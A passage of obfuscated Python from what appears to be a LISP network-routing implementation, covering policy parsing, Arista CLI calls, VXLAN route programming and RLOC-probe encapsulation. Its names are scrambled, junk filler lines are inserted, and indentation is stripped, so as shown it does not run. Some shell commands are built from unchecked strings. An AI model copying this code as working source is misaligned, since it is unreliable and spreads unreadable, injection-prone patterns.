if ( I111II == "geo-name" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
O0oOOO00 . geo_name = OOOOOOOo00
if 34 - 34: O0 - o0oOOo0O0Ooo % OOooOOo . OoO0O00 % IiII
if 63 - 63: O0 % iIii1I11I1II1 . o0oOOo0O0Ooo . I1IiiI * Ii1I % i1IIi
if ( I111II == "elp-name" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
O0oOOO00 . elp_name = OOOOOOOo00
if 47 - 47: II111iiii * I1ii11iIi11i
if 70 - 70: I1ii11iIi11i - o0oOOo0O0Ooo
if ( I111II == "rle-name" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
O0oOOO00 . rle_name = OOOOOOOo00
if 71 - 71: I1ii11iIi11i * i1IIi
if 67 - 67: I1ii11iIi11i % OoOoOO00 . iII111i / Ii1I . I1IiiI
if ( I111II == "json-name" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
O0oOOO00 . json_name = OOOOOOOo00
if 48 - 48: IiII + II111iiii . I1IiiI % o0oOOo0O0Ooo
if 57 - 57: OOooOOo . I11i % OoOoOO00
if ( I111II == "datetime-range" ) :
for IiIIi1IiiIiI in range ( len ( IiO0ooo00ooO00 ) ) :
OOOOOOOo00 = i11II [ IiIIi1IiiIiI ]
O0oOOO00 = IiO0ooo00ooO00 [ IiIIi1IiiIiI ]
if ( OOOOOOOo00 == "" ) : continue
I11iIi1i1I1i1 = lisp_datetime ( OOOOOOOo00 [ 0 : 19 ] )
oO0ooo00OO = lisp_datetime ( OOOOOOOo00 [ 19 : : ] )
if ( I11iIi1i1I1i1 . valid_datetime ( ) and oO0ooo00OO . valid_datetime ( ) ) :
O0oOOO00 . datetime_lower = I11iIi1i1I1i1
O0oOOO00 . datetime_upper = oO0ooo00OO
if 68 - 68: iIii1I11I1II1 % I1ii11iIi11i % II111iiii / O0 + iII111i
if 78 - 78: iII111i - OOooOOo / I1Ii111
if 38 - 38: I11i % i1IIi + o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI
if 1 - 1: II111iiii * o0oOOo0O0Ooo . O0 - Ii1I / oO0o
if 17 - 17: OoooooooOO % OoooooooOO + Oo0Ooo + I1Ii111
if 56 - 56: I11i % OoOoOO00 - OoO0O00
if 31 - 31: iII111i % i11iIiiIii - Ii1I / OOooOOo - I1Ii111
if ( I111II == "set-action" ) :
oo00ooOOOo0O . set_action = i11II
if 60 - 60: o0oOOo0O0Ooo + Oo0Ooo . O0
if ( I111II == "set-record-ttl" ) :
oo00ooOOOo0O . set_record_ttl = int ( i11II )
if 51 - 51: i11iIiiIii / iIii1I11I1II1 . I1IiiI - Ii1I * I1Ii111 . iII111i
if ( I111II == "set-instance-id" ) :
if ( oo00ooOOOo0O . set_source_eid == None ) :
oo00ooOOOo0O . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 72 - 72: Ii1I . I11i / i1IIi % i1IIi + I1ii11iIi11i
if ( oo00ooOOOo0O . set_dest_eid == None ) :
oo00ooOOOo0O . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 56 - 56: OoO0O00 - OoOoOO00 - II111iiii * o0oOOo0O0Ooo
OoOOO00o000OOO = int ( i11II )
oo00ooOOOo0O . set_source_eid . instance_id = OoOOO00o000OOO
oo00ooOOOo0O . set_dest_eid . instance_id = OoOOO00o000OOO
if 87 - 87: ooOoO0o * OoooooooOO % O0 * OoooooooOO . I1Ii111
if ( I111II == "set-source-eid" ) :
if ( oo00ooOOOo0O . set_source_eid == None ) :
oo00ooOOOo0O . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 66 - 66: OoO0O00 * Ii1I . OoO0O00
oo00ooOOOo0O . set_source_eid . store_prefix ( i11II )
if ( OoOOO00o000OOO != None ) : oo00ooOOOo0O . set_source_eid . instance_id = OoOOO00o000OOO
if 90 - 90: II111iiii % Ii1I
if ( I111II == "set-destination-eid" ) :
if ( oo00ooOOOo0O . set_dest_eid == None ) :
oo00ooOOOo0O . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 67 - 67: I1IiiI - I11i - i11iIiiIii
oo00ooOOOo0O . set_dest_eid . store_prefix ( i11II )
if ( OoOOO00o000OOO != None ) : oo00ooOOOo0O . set_dest_eid . instance_id = OoOOO00o000OOO
if 45 - 45: ooOoO0o - IiII / OoO0O00 / IiII
if ( I111II == "set-rloc-address" ) :
oo00ooOOOo0O . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
oo00ooOOOo0O . set_rloc_address . store_address ( i11II )
if 63 - 63: ooOoO0o . i11iIiiIii + iII111i . OoO0O00 / ooOoO0o % iII111i
if ( I111II == "set-rloc-record-name" ) :
oo00ooOOOo0O . set_rloc_record_name = i11II
if 23 - 23: iIii1I11I1II1 - ooOoO0o / I11i * I11i
if ( I111II == "set-elp-name" ) :
oo00ooOOOo0O . set_elp_name = i11II
if 62 - 62: OOooOOo - I1IiiI * oO0o + O0 / ooOoO0o * iIii1I11I1II1
if ( I111II == "set-geo-name" ) :
oo00ooOOOo0O . set_geo_name = i11II
if 25 - 25: I1Ii111 % Oo0Ooo + OoO0O00 % OOooOOo
if ( I111II == "set-rle-name" ) :
oo00ooOOOo0O . set_rle_name = i11II
if 85 - 85: I1IiiI . i11iIiiIii - ooOoO0o * I11i * OoOoOO00 * I11i
if ( I111II == "set-json-name" ) :
oo00ooOOOo0O . set_json_name = i11II
if 29 - 29: I1Ii111 * I1Ii111 . iII111i + o0oOOo0O0Ooo
if ( I111II == "policy-name" ) :
oo00ooOOOo0O . policy_name = i11II
if 57 - 57: I1Ii111 - IiII
if 89 - 89: oO0o + iII111i
if 52 - 52: OOooOOo % O0 * I1ii11iIi11i . I1ii11iIi11i / IiII
if 7 - 7: II111iiii
if 7 - 7: iIii1I11I1II1 . O0 + Ii1I % I1IiiI * O0 + OoO0O00
if 3 - 3: Oo0Ooo * OoooooooOO * oO0o % OoOoOO00 * OoOoOO00 . ooOoO0o
oo00ooOOOo0O . match_clauses = IiO0ooo00ooO00
oo00ooOOOo0O . save_policy ( )
return
if 16 - 16: ooOoO0o / o0oOOo0O0Ooo - O0 * I1IiiI
if 13 - 13: iII111i . iII111i % O0 % o0oOOo0O0Ooo
lisp_policy_commands = {
"lisp policy" : [ lisp_policy_command , {
"policy-name" : [ True ] ,
"match" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"source-eid" : [ True ] ,
"destination-eid" : [ True ] ,
"source-rloc" : [ True ] ,
"destination-rloc" : [ True ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"datetime-range" : [ True ] ,
"set-action" : [ False , "process" , "drop" ] ,
"set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
"set-instance-id" : [ True , 0 , 0xffffffff ] ,
"set-source-eid" : [ True ] ,
"set-destination-eid" : [ True ] ,
"set-rloc-address" : [ True ] ,
"set-rloc-record-name" : [ True ] ,
"set-elp-name" : [ True ] ,
"set-geo-name" : [ True ] ,
"set-rle-name" : [ True ] ,
"set-json-name" : [ True ] } ]
}
if 99 - 99: OoO0O00 - OoOoOO00 + OoO0O00
if 67 - 67: I1Ii111
if 31 - 31: OoO0O00 * Oo0Ooo % O0 * II111iiii + ooOoO0o * I1IiiI
if 77 - 77: ooOoO0o
if 98 - 98: I1Ii111 + I1ii11iIi11i % OoO0O00 * Ii1I + iII111i
if 6 - 6: iII111i / iII111i . i11iIiiIii
if 12 - 12: I11i - OoO0O00
def lisp_send_to_arista ( command , interface ) :
interface = "" if ( interface == None ) else "interface " + interface
if 68 - 68: IiII - OoOoOO00
ii1i1iIi1Ii1I1 = command
if ( interface != "" ) : ii1i1iIi1Ii1I1 = interface + ": " + ii1i1iIi1Ii1I1
lprint ( "Send CLI command '{}' to hardware" . format ( ii1i1iIi1Ii1I1 ) )
if 100 - 100: I11i % i1IIi / OoooooooOO
commands = '''
enable
configure
{}
{}
''' . format ( interface , command )
if 12 - 12: Ii1I . Ii1I
os . system ( "FastCli -c '{}'" . format ( commands ) )
return
if 13 - 13: oO0o - i1IIi / i1IIi + OoooooooOO
if 57 - 57: OoooooooOO / O0 + I1ii11iIi11i % I11i * oO0o / Ii1I
if 49 - 49: I1IiiI * ooOoO0o * OOooOOo + OoO0O00 + ooOoO0o
if 42 - 42: i1IIi . OoO0O00 % iII111i
if 57 - 57: I1ii11iIi11i / I1IiiI
if 69 - 69: iII111i - iII111i . OoO0O00 / oO0o - OoO0O00 + I1Ii111
if 98 - 98: iII111i . oO0o - O0 % I1IiiI . I1ii11iIi11i / i1IIi
def lisp_arista_is_alive ( prefix ) :
ooO0ooooO = "enable\nsh plat trident l3 software routes {}\n" . format ( prefix )
Oo0Ooo0O0 = commands . getoutput ( "FastCli -c '{}'" . format ( ooO0ooooO ) )
if 72 - 72: I1IiiI / Oo0Ooo % IiII - O0 / O0 * O0
if 83 - 83: O0 / I1Ii111 - OoooooooOO
if 42 - 42: Ii1I / i1IIi - IiII / I1Ii111
if 39 - 39: OoooooooOO
Oo0Ooo0O0 = Oo0Ooo0O0 . split ( "\n" ) [ 1 ]
IiiI11ii = Oo0Ooo0O0 . split ( " " )
IiiI11ii = IiiI11ii [ - 1 ] . replace ( "\r" , "" )
if 51 - 51: OoO0O00 + i11iIiiIii / II111iiii
if 52 - 52: o0oOOo0O0Ooo * I1ii11iIi11i % OoOoOO00 . Ii1I . OoO0O00 * I1Ii111
if 26 - 26: ooOoO0o % OoO0O00 * OoO0O00 * O0 . i1IIi
if 32 - 32: i11iIiiIii
return ( IiiI11ii == "Y" )
if 43 - 43: iIii1I11I1II1 + oO0o + OoooooooOO
if 69 - 69: Oo0Ooo - o0oOOo0O0Ooo
if 18 - 18: OoooooooOO
if 52 - 52: i1IIi - II111iiii / i1IIi . I1Ii111 . OoooooooOO - IiII
if 47 - 47: iIii1I11I1II1 / IiII
if 81 - 81: I1Ii111 . i1IIi / o0oOOo0O0Ooo
if 30 - 30: i11iIiiIii . I1IiiI
if 5 - 5: Ii1I / O0 + iIii1I11I1II1
if 22 - 22: ooOoO0o . ooOoO0o * OOooOOo % OoOoOO00
if 51 - 51: OoOoOO00 . oO0o - OoOoOO00
if 79 - 79: iII111i
if 71 - 71: i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
if 12 - 12: I1ii11iIi11i - i11iIiiIii + I1IiiI . Oo0Ooo
if 26 - 26: oO0o + I1Ii111 + IiII * o0oOOo0O0Ooo . oO0o
if 95 - 95: OoOoOO00 . I1Ii111 / Ii1I . I1Ii111 % OoO0O00
if 16 - 16: Ii1I / I1IiiI / I1IiiI - OoooooooOO
if 13 - 13: OOooOOo / OoooooooOO
if 7 - 7: II111iiii - ooOoO0o
if 72 - 72: Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
if 87 - 87: II111iiii
if 53 - 53: OoOoOO00 * i11iIiiIii / I1Ii111
if 100 - 100: ooOoO0o + I1IiiI * oO0o + ooOoO0o
if 24 - 24: i11iIiiIii + ooOoO0o
if 80 - 80: IiII % I11i % oO0o
if 97 - 97: i1IIi * i11iIiiIii / Ii1I - I1IiiI % IiII
if 70 - 70: iIii1I11I1II1
if 2 - 2: IiII - i1IIi * IiII % O0 / Ii1I
if 64 - 64: iII111i - Oo0Ooo
if 73 - 73: iIii1I11I1II1 * I1Ii111 * OoO0O00
if 68 - 68: ooOoO0o * Ii1I / I1ii11iIi11i * OoooooooOO + OoooooooOO . OoooooooOO
if 50 - 50: I1IiiI % o0oOOo0O0Ooo
if 1 - 1: II111iiii
if 22 - 22: I1Ii111 + iII111i
if 50 - 50: iII111i % OoOoOO00 - II111iiii + II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
if 24 - 24: I1Ii111 * I1ii11iIi11i . OOooOOo . I1IiiI - I1ii11iIi11i
if 56 - 56: I1IiiI * Oo0Ooo + OoO0O00 - oO0o * I1Ii111
if 68 - 68: ooOoO0o * i11iIiiIii * OOooOOo % iII111i
if 10 - 10: Ii1I / Oo0Ooo - i1IIi
def lisp_program_vxlan_hardware ( mc ) :
if 11 - 11: I11i * iII111i
if 28 - 28: II111iiii + IiII / Oo0Ooo * I1IiiI - OOooOOo
if 2 - 2: oO0o + I11i / I1Ii111 . I11i
if 59 - 59: Ii1I
if 47 - 47: iII111i % iII111i
if 81 - 81: oO0o / I1ii11iIi11i . OoooooooOO % II111iiii / oO0o
if ( os . path . exists ( "/persist/local/lispers.net" ) == False ) : return
if 23 - 23: IiII + oO0o + o0oOOo0O0Ooo . I1ii11iIi11i / i11iIiiIii + iIii1I11I1II1
if 74 - 74: I11i % OOooOOo
if 57 - 57: O0 + I1IiiI + i11iIiiIii
if 90 - 90: I1ii11iIi11i . OoO0O00 * iIii1I11I1II1 - Oo0Ooo
if ( len ( mc . best_rloc_set ) == 0 ) : return
if 28 - 28: I1IiiI . ooOoO0o - ooOoO0o * OOooOOo . IiII
if 16 - 16: iIii1I11I1II1 % i11iIiiIii / Ii1I % iIii1I11I1II1 / iII111i
if 27 - 27: II111iiii * OoooooooOO / Oo0Ooo % O0
if 41 - 41: oO0o / iIii1I11I1II1 % iII111i - I1Ii111 % I11i * i11iIiiIii
IiI1Iiii = mc . eid . print_prefix_no_iid ( )
I1IIiIIIii = mc . best_rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 21 - 21: O0
if 14 - 14: IiII / I1ii11iIi11i + Ii1I
if 48 - 48: I1Ii111 * oO0o / o0oOOo0O0Ooo * OoOoOO00 * ooOoO0o
if 38 - 38: I1IiiI * Ii1I + Oo0Ooo - OoooooooOO
o0O00OOo = commands . getoutput ( "ip route get {} | egrep vlan4094" . format ( IiI1Iiii ) )
if 29 - 29: I11i / I1ii11iIi11i * iII111i . OoooooooOO - Oo0Ooo - IiII
if ( o0O00OOo != "" ) :
lprint ( "Route {} already in hardware: '{}'" . format ( green ( IiI1Iiii , False ) , o0O00OOo ) )
if 6 - 6: OOooOOo - I1IiiI . IiII
return
if 40 - 40: II111iiii
if 13 - 13: OoOoOO00
if 23 - 23: Oo0Ooo / II111iiii % OOooOOo % iII111i - Oo0Ooo / OoO0O00
if 7 - 7: Ii1I / I11i / II111iiii % I11i * I11i + iIii1I11I1II1
if 6 - 6: iIii1I11I1II1 * oO0o - iIii1I11I1II1 . O0 . O0
if 96 - 96: I1Ii111 * II111iiii % i11iIiiIii - oO0o
if 32 - 32: i11iIiiIii * o0oOOo0O0Ooo . OoooooooOO / O0
Ii1o0O00ooo = commands . getoutput ( "ifconfig | egrep 'vxlan|vlan4094'" )
if ( Ii1o0O00ooo . find ( "vxlan" ) == - 1 ) :
lprint ( "No VXLAN interface found, cannot program hardware" )
return
if 87 - 87: Ii1I % o0oOOo0O0Ooo . ooOoO0o * iIii1I11I1II1 * i11iIiiIii * i11iIiiIii
if ( Ii1o0O00ooo . find ( "vlan4094" ) == - 1 ) :
lprint ( "No vlan4094 interface found, cannot program hardware" )
return
if 74 - 74: ooOoO0o * OOooOOo . I1ii11iIi11i
O0O0iIIi11Ii = commands . getoutput ( "ip addr | egrep vlan4094 | egrep inet" )
if ( O0O0iIIi11Ii == "" ) :
lprint ( "No IP address found on vlan4094, cannot program hardware" )
return
if 41 - 41: OoO0O00 % Oo0Ooo - oO0o + OoO0O00 / OOooOOo
O0O0iIIi11Ii = O0O0iIIi11Ii . split ( "inet " ) [ 1 ]
O0O0iIIi11Ii = O0O0iIIi11Ii . split ( "/" ) [ 0 ]
if 74 - 74: ooOoO0o . oO0o - Oo0Ooo % OOooOOo
if 15 - 15: o0oOOo0O0Ooo - Oo0Ooo / IiII
if 94 - 94: Ii1I + o0oOOo0O0Ooo / II111iiii
if 18 - 18: I1IiiI
if 27 - 27: ooOoO0o
if 20 - 20: OoooooooOO * OOooOOo
if 77 - 77: Ii1I - OoooooooOO . OoOoOO00
oo00o = [ ]
o000 = commands . getoutput ( "arp -i vlan4094" ) . split ( "\n" )
for oOOo0ooO0 in o000 :
if ( oOOo0ooO0 . find ( "vlan4094" ) == - 1 ) : continue
if ( oOOo0ooO0 . find ( "(incomplete)" ) == - 1 ) : continue
II11111Iii1I = oOOo0ooO0 . split ( " " ) [ 0 ]
oo00o . append ( II11111Iii1I )
if 53 - 53: I11i . i11iIiiIii - iIii1I11I1II1 / I1Ii111
if 86 - 86: i1IIi % OoO0O00 - OoooooooOO
II11111Iii1I = None
Ii1iIiI1I = O0O0iIIi11Ii
O0O0iIIi11Ii = O0O0iIIi11Ii . split ( "." )
for IiIIi1IiiIiI in range ( 1 , 255 ) :
O0O0iIIi11Ii [ 3 ] = str ( IiIIi1IiiIiI )
IiiIIi1 = "." . join ( O0O0iIIi11Ii )
if ( IiiIIi1 in oo00o ) : continue
if ( IiiIIi1 == Ii1iIiI1I ) : continue
II11111Iii1I = IiiIIi1
break
if 63 - 63: o0oOOo0O0Ooo . iIii1I11I1II1 % IiII * i11iIiiIii
if ( II11111Iii1I == None ) :
lprint ( "Address allocation failed for vlan4094, cannot program " + "hardware" )
if 70 - 70: iIii1I11I1II1
return
if 12 - 12: OoOoOO00 / o0oOOo0O0Ooo - I1ii11iIi11i + oO0o + O0
if 9 - 9: I1ii11iIi11i * OoooooooOO . O0 . ooOoO0o * i11iIiiIii / i1IIi
if 38 - 38: OoOoOO00 . OoooooooOO % I1ii11iIi11i . oO0o % oO0o
if 80 - 80: i11iIiiIii / OoOoOO00 . OOooOOo . iIii1I11I1II1
if 81 - 81: I1ii11iIi11i * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO
if 64 - 64: Oo0Ooo . I1ii11iIi11i / ooOoO0o % oO0o . iIii1I11I1II1
if 84 - 84: II111iiii . oO0o * O0 / iII111i + OoooooooOO
OOO = I1IIiIIIii . split ( "." )
ooOo0O = lisp_hex_string ( OOO [ 1 ] ) . zfill ( 2 )
OOoo0oo0oO0O = lisp_hex_string ( OOO [ 2 ] ) . zfill ( 2 )
OoOo0O0O00O000o = lisp_hex_string ( OOO [ 3 ] ) . zfill ( 2 )
Ii = "00:00:00:{}:{}:{}" . format ( ooOo0O , OOoo0oo0oO0O , OoOo0O0O00O000o )
iIo0o000OOO00O = "0000.00{}.{}{}" . format ( ooOo0O , OOoo0oo0oO0O , OoOo0O0O00O000o )
IIiIiii1I1i = "arp -i vlan4094 -s {} {}" . format ( II11111Iii1I , Ii )
os . system ( IIiIiii1I1i )
if 43 - 43: OoOoOO00 - o0oOOo0O0Ooo
if 22 - 22: i1IIi
if 33 - 33: O0
if 34 - 34: I1Ii111 . IiII % iII111i
oOoo0O0oO0 = ( "mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}" ) . format ( iIo0o000OOO00O , I1IIiIIIii )
if 49 - 49: o0oOOo0O0Ooo
lisp_send_to_arista ( oOoo0O0oO0 , None )
if 11 - 11: I1ii11iIi11i - i11iIiiIii - I1ii11iIi11i - I1Ii111 . i1IIi
if 55 - 55: I11i . IiII / i11iIiiIii / Oo0Ooo
if 20 - 20: OoO0O00 - OoooooooOO . I1ii11iIi11i
if 1 - 1: I11i
if 7 - 7: II111iiii / iII111i / oO0o
OoooO0O0o0oOO = "ip route add {} via {}" . format ( IiI1Iiii , II11111Iii1I )
os . system ( OoooO0O0o0oOO )
if 9 - 9: OoooooooOO / OOooOOo / O0 - OoOoOO00
lprint ( "Hardware programmed with commands:" )
OoooO0O0o0oOO = OoooO0O0o0oOO . replace ( IiI1Iiii , green ( IiI1Iiii , False ) )
lprint ( " " + OoooO0O0o0oOO )
lprint ( " " + IIiIiii1I1i )
oOoo0O0oO0 = oOoo0O0oO0 . replace ( I1IIiIIIii , red ( I1IIiIIIii , False ) )
lprint ( " " + oOoo0O0oO0 )
return
if 22 - 22: Ii1I * I1ii11iIi11i * o0oOOo0O0Ooo - I1IiiI . i11iIiiIii
if 30 - 30: O0 / oO0o * i11iIiiIii + iIii1I11I1II1 + O0 % I1IiiI
if 95 - 95: ooOoO0o % OOooOOo
if 17 - 17: i1IIi + Ii1I
if 35 - 35: iIii1I11I1II1 - Oo0Ooo - OoooooooOO % I1ii11iIi11i
if 27 - 27: Oo0Ooo * II111iiii - OOooOOo + o0oOOo0O0Ooo
if 26 - 26: oO0o / I1ii11iIi11i - oO0o
def lisp_clear_hardware_walk ( mc , parms ) :
IIII1 = mc . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( IIII1 ) )
return ( [ True , None ] )
if 9 - 9: ooOoO0o * iIii1I11I1II1 * OoooooooOO
if 13 - 13: iII111i . i11iIiiIii * o0oOOo0O0Ooo . iII111i
if 96 - 96: Ii1I
if 90 - 90: II111iiii
if 93 - 93: i11iIiiIii / Ii1I * Oo0Ooo . iII111i % iII111i / IiII
if 15 - 15: OoOoOO00 % I1Ii111 - iIii1I11I1II1
if 52 - 52: i11iIiiIii * ooOoO0o
if 15 - 15: OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
def lisp_clear_map_cache ( ) :
global lisp_map_cache , lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap , lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list , lisp_gleaned_groups
global lisp_no_map_request_rate_limit
if 91 - 91: ooOoO0o
IiI111i = bold ( "User cleared" , False )
I1I1 = lisp_map_cache . cache_count
lprint ( "{} map-cache with {} entries" . format ( IiI111i , I1I1 ) )
if 36 - 36: OoooooooOO . O0 + OOooOOo * I1IiiI . iIii1I11I1II1
if ( lisp_program_hardware ) :
lisp_map_cache . walk_cache ( lisp_clear_hardware_walk , None )
if 93 - 93: OoOoOO00 % OoooooooOO * iIii1I11I1II1 . Ii1I % I1ii11iIi11i
lisp_map_cache = lisp_cache ( )
if 93 - 93: O0 % IiII
if 40 - 40: iII111i - OoOoOO00 / IiII - I11i
if 86 - 86: OoOoOO00 + oO0o / II111iiii % IiII % IiII * O0
if 32 - 32: OoO0O00 / OoOoOO00 % iII111i * I11i . OoO0O00
lisp_no_map_request_rate_limit = lisp_get_timestamp ( )
if 26 - 26: IiII
if 15 - 15: OoooooooOO / OoO0O00 - II111iiii / IiII + oO0o
if 48 - 48: iII111i * OoO0O00 * OoOoOO00 * I11i
if 74 - 74: ooOoO0o
if 93 - 93: Oo0Ooo % ooOoO0o
lisp_rloc_probe_list = { }
if 38 - 38: II111iiii . I1Ii111 . iIii1I11I1II1 / o0oOOo0O0Ooo
if 6 - 6: ooOoO0o - i1IIi * I1IiiI
if 24 - 24: iIii1I11I1II1 / I1Ii111
if 16 - 16: OoOoOO00 * I1Ii111 - I1IiiI / I1Ii111
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
if 64 - 64: I1ii11iIi11i . i1IIi % II111iiii % Oo0Ooo + oO0o - I1IiiI
if 24 - 24: IiII . II111iiii . II111iiii . OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
if 44 - 44: iII111i
lisp_rtr_list = { }
if 56 - 56: II111iiii / Oo0Ooo % IiII * II111iiii - iIii1I11I1II1 + ooOoO0o
if 33 - 33: o0oOOo0O0Ooo . I11i / I1IiiI
if 29 - 29: o0oOOo0O0Ooo - ooOoO0o
if 59 - 59: I11i / IiII * OoO0O00 / IiII . I1Ii111
lisp_gleaned_groups = { }
if 82 - 82: OOooOOo . iIii1I11I1II1 + I1Ii111
if 14 - 14: IiII . i11iIiiIii
if 17 - 17: ooOoO0o % ooOoO0o * oO0o
if 8 - 8: ooOoO0o + OoO0O00 . II111iiii / iIii1I11I1II1 - OOooOOo
lisp_process_data_plane_restart ( True )
return
if 87 - 87: iIii1I11I1II1 . IiII % I1IiiI . OoO0O00 - I1Ii111
if 53 - 53: I1Ii111 % i11iIiiIii
if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
if 42 - 42: OOooOOo - I1ii11iIi11i
if 93 - 93: I1Ii111 + OOooOOo % ooOoO0o / I1Ii111 % OOooOOo . IiII
if 37 - 37: iII111i * oO0o / oO0o / Ii1I % I11i
if 12 - 12: i11iIiiIii
if 62 - 62: oO0o + OOooOOo + oO0o + I1IiiI
def lisp_encapsulate_rloc_probe ( lisp_sockets , rloc , nat_info , packet ) :
if ( len ( lisp_sockets ) != 4 ) : return
if 10 - 10: IiII - Oo0Ooo % ooOoO0o
IIiI11ii111i = lisp_myrlocs [ 0 ]
if 79 - 79: ooOoO0o / i11iIiiIii
if 36 - 36: OoOoOO00 - OoOoOO00
if 7 - 7: OoOoOO00 - OoO0O00 % OoOoOO00 . I1ii11iIi11i % Oo0Ooo * iII111i
if 90 - 90: IiII - OOooOOo + iIii1I11I1II1
if 88 - 88: ooOoO0o . o0oOOo0O0Ooo . OOooOOo - I11i
IiiI1iii1iIiiI = len ( packet ) + 28
Ooo0oO = struct . pack ( "BBHIBBHII" , 0x45 , 0 , socket . htons ( IiiI1iii1iIiiI ) , 0 , 64 ,
17 , 0 , socket . htonl ( IIiI11ii111i . address ) , socket . htonl ( rloc . address ) )
Ooo0oO = lisp_ip_checksum ( Ooo0oO )
if 76 - 76: IiII % I1IiiI . iII111i
o0oOo00 = struct . pack ( "HHHH" , 0 , socket . htons ( LISP_CTRL_PORT ) ,
socket . htons ( IiiI1iii1iIiiI - 20 ) , 0 )
if 5 - 5: ooOoO0o . oO0o - OoOoOO00 - OoooooooOO
if 2 - 2: OOooOOo
if 37 - 37: IiII - iIii1I11I1II1 * i11iIiiIii . ooOoO0o
if 78 - 78: OOooOOo - I1ii11iIi11i + iII111i % OoOoOO00
packet = lisp_packet ( Ooo0oO + o0oOo00 + packet )
if 28 - 28: I11i + i1IIi / i11iIiiIii * OOooOOo * II111iiii
if 78 - 78: OoO0O00 - i1IIi % I1Ii111
if 87 - 87: I11i
if 37 - 37: iII111i . I1Ii111 - iII111i - I11i - iIii1I11I1II1 - II111iiii
packet . inner_dest . copy_address ( rloc )
packet . inner_dest . instance_id = 0xffffff
packet . inner_source . copy_address ( IIiI11ii111i )
packet . inner_ttl = 64
packet . outer_dest . copy_address ( rloc )
packet . outer_source . copy_address ( IIiI11ii111i )
packet . outer_version = packet . outer_dest . afi_to_version ( )
packet . outer_ttl = 64
packet . encap_port = nat_info . port if nat_info else LISP_DATA_PORT
if 80 - 80: I1Ii111 % O0 - IiII / II111iiii + i1IIi
o0oooOoOoOo = red ( rloc . print_address_no_iid ( ) , False )
if ( nat_info ) :
I1I1111I11I = " {}" . format ( blue ( nat_info . hostname , False ) )
oO0oo000O = bold ( "RLOC-probe request" , False )
else :
I1I1111I11I = ""
oO0oo000O = bold ( "RLOC-probe reply" , False )
if 4 - 4: OOooOOo + II111iiii
if 1 - 1: OoooooooOO * I1Ii111 - I11i / IiII
lprint ( ( "Data encapsulate {} to {}{} port {} for " + "NAT-traversal" ) . format ( oO0oo000O , o0oooOoOoOo , I1I1111I11I , packet . encap_port ) )
if 43 - 43: i11iIiiIii * I1IiiI
if 48 - 48: Oo0Ooo - OOooOOo / iII111i % I1ii11iIi11i . OoOoOO00
if 6 - 6: i11iIiiIii
if 51 - 51: o0oOOo0O0Ooo - OoooooooOO - I11i % i11iIiiIii / I1IiiI + IiII
if 91 - 91: O0
if ( packet . encode ( None ) == None ) : return
packet . print_packet ( "Send" , True )
if 13 - 13: o0oOOo0O0Ooo
IiiIii11I1i1I = lisp_sockets [ 3 ]
packet . send_packet ( IiiIii11I1i1I , packet . outer_dest )
del ( packet )
return
if 61 - 61: o0oOOo0O0Ooo * OoOoOO00 % i11iIiiIii - OoO0O00 / OoOoOO00 . OoO0O00
if 40 - 40: O0 * OoooooooOO
if 39 - 39: OoooooooOO % II111iiii . o0oOOo0O0Ooo
if 29 - 29: I11i . o0oOOo0O0Ooo . i1IIi . o0oOOo0O0Ooo
if 77 - 77: iIii1I11I1II1 + iIii1I11I1II1
if 52 - 52: I1ii11iIi11i - IiII % I1IiiI % i1IIi
if 98 - 98: I1Ii111 + II111iiii % OoO0O00 % iII111i
if 54 - 54: II111iiii . ooOoO0o . iII111i - I1IiiI
def lisp_get_default_route_next_hops ( ) :
